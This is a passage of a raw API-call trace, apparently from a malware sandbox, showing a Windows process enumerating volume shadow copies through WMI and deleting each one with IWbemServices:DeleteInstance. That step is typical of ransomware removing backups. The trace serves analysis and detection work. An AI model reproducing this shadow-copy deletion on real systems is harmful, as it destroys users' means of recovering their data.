WbemDefPath:IWbemPath:GetText (in: This=0x1c901a60, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"") returned 0x0 [0113.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0113.457] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0113.457] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0113.457] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0113.457] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0113.457] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0113.457] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0113.457] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0113.457] IWbemClassObject:Get (in: This=0x1c9014d0, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0113.458] WbemDefPath:IWbemPath:GetText (in: This=0x1c901a60, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0113.458] WbemDefPath:IWbemPath:GetText (in: This=0x1c901a60, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"") returned 0x0 [0113.458] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0115.569] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0115.569] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c902450, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0115.572] IUnknown:QueryInterface (in: This=0x1c902450, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c902450) returned 0x0 [0115.572] IUnknown:QueryInterface (in: This=0x1c902450, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0115.573] IUnknown:QueryInterface (in: This=0x1c902450, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0115.573] IUnknown:AddRef (This=0x1c902450) returned 0x3 [0115.573] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0115.573] IUnknown:QueryInterface (in: This=0x1c902450, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c902458) returned 0x0 [0115.573] IMarshal:GetUnmarshalClass (in: This=0x1c902458, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0115.573] IUnknown:Release (This=0x1c902458) returned 0x3 [0115.573] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0115.573] IUnknown:AddRef (This=0x1c902450) returned 0x4 [0115.573] IUnknown:QueryInterface (in: This=0x1c902450, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0115.574] IUnknown:Release (This=0x1c902450) returned 0x3 [0115.574] IUnknown:Release (This=0x1c902450) returned 0x2 [0115.574] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0115.574] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0115.574] IUnknown:AddRef (This=0x1c902450) returned 0x3 [0115.574] IUnknown:QueryInterface (in: This=0x1c902450, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c902450) returned 0x0 [0115.574] IUnknown:Release (This=0x1c902450) returned 0x3 [0115.574] IUnknown:Release (This=0x1c902450) returned 0x2 [0115.574] IUnknown:Release (This=0x1c902450) returned 0x1 [0115.574] CoTaskMemFree (pv=0x1b77f8d0) [0115.574] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0115.574] IUnknown:AddRef (This=0x1c902450) returned 0x2 [0115.574] IWbemClassObject:Get (in: This=0x1c902450, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0115.575] IWbemClassObject:Get (in: This=0x1c902450, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0115.575] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"") returned 0x53 [0115.575] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0115.575] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0115.576] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0115.576] IUnknown:Release (This=0x212498) returned 0x1 [0115.576] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c901c20) returned 0x0 [0115.576] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901c20, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0115.577] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c901c20, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c902a10) returned 0x0 [0115.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902a10, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c902a10) returned 0x0 [0115.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902a10, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0115.577] WbemDefPath:IUnknown:AddRef (This=0x1c902a10) returned 0x3 [0115.577] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0115.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902a10, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b786250) returned 0x0 [0115.577] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b786250, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0115.577] WbemDefPath:IUnknown:Release (This=0x1b786250) returned 0x3 [0115.578] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0115.578] WbemDefPath:IUnknown:AddRef (This=0x1c902a10) returned 0x4 [0115.578] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902a10, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0115.578] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x3 [0115.578] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x2 [0115.578] WbemDefPath:IUnknown:Release (This=0x1c901c20) returned 0x0 [0115.578] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x1 [0115.578] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0115.578] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0115.578] WbemDefPath:IUnknown:AddRef (This=0x1c902a10) returned 0x2 [0115.578] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902a10, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c902a10) returned 0x0 [0115.578] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x2 [0115.578] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x1 [0115.579] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0115.579] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0115.579] WbemDefPath:IUnknown:AddRef (This=0x1c902a10) returned 0x2 [0115.579] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902a10, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c902a10) returned 0x0 [0115.579] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x2 [0115.579] WbemDefPath:IUnknown:AddRef (This=0x1c902a10) returned 0x3 [0115.579] WbemDefPath:IWbemPath:SetText (This=0x1c902a10, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"") returned 0x0 [0115.579] WbemDefPath:IUnknown:Release (This=0x1c902a10) returned 0x2 [0115.579] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0115.579] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0115.580] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0115.580] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0115.580] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0115.580] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0115.581] IWbemClassObject:Get (in: This=0x1c902450, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0115.581] SysStringLen (param_1="root\\cimv2") returned 0xa [0115.581] IWbemClassObject:Get (in: This=0x1c902450, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0115.581] SysStringLen (param_1="root\\cimv2") returned 0xa [0115.581] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0115.581] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0115.581] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0115.581] IWbemClassObject:Get (in: This=0x1c902450, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0115.581] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0115.581] IWbemClassObject:Get (in: This=0x1c902450, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0115.581] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0115.582] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c902a10, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0115.582] WbemDefPath:IWbemPath:GetText (in: This=0x1c902a10, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0115.582] WbemDefPath:IWbemPath:GetText (in: This=0x1c902a10, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"") returned 0x0 [0115.582] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0115.582] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0115.582] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0115.582] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0115.582] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0115.582] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0115.582] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0115.582] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0115.582] IWbemClassObject:Get (in: This=0x1c902450, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0115.582] WbemDefPath:IWbemPath:GetText (in: This=0x1c902a10, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0115.582] WbemDefPath:IWbemPath:GetText (in: This=0x1c902a10, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"") returned 0x0 [0115.582] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0116.616] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0116.616] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c904ef0, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0116.616] IUnknown:QueryInterface (in: This=0x1c904ef0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c904ef0) returned 0x0 [0116.617] IUnknown:QueryInterface (in: This=0x1c904ef0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0116.617] IUnknown:QueryInterface (in: This=0x1c904ef0, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0116.617] IUnknown:AddRef (This=0x1c904ef0) returned 0x3 [0116.617] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0116.617] IUnknown:QueryInterface (in: This=0x1c904ef0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c904ef8) returned 0x0 [0116.617] IMarshal:GetUnmarshalClass (in: This=0x1c904ef8, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.617] IUnknown:Release (This=0x1c904ef8) returned 0x3 [0116.618] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0116.618] IUnknown:AddRef (This=0x1c904ef0) returned 0x4 [0116.618] IUnknown:QueryInterface (in: This=0x1c904ef0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0116.618] IUnknown:Release (This=0x1c904ef0) returned 0x3 [0116.618] IUnknown:Release (This=0x1c904ef0) returned 0x2 [0116.618] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0116.618] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0116.618] IUnknown:AddRef (This=0x1c904ef0) returned 0x3 [0116.618] IUnknown:QueryInterface (in: This=0x1c904ef0, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c904ef0) returned 0x0 [0116.618] IUnknown:Release (This=0x1c904ef0) returned 0x3 [0116.618] IUnknown:Release (This=0x1c904ef0) returned 0x2 [0116.618] IUnknown:Release (This=0x1c904ef0) returned 0x1 [0116.618] CoTaskMemFree (pv=0x1b77f8d0) [0116.619] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0116.619] IUnknown:AddRef (This=0x1c904ef0) returned 0x2 [0116.619] IWbemClassObject:Get (in: This=0x1c904ef0, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0116.619] IWbemClassObject:Get (in: This=0x1c904ef0, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: 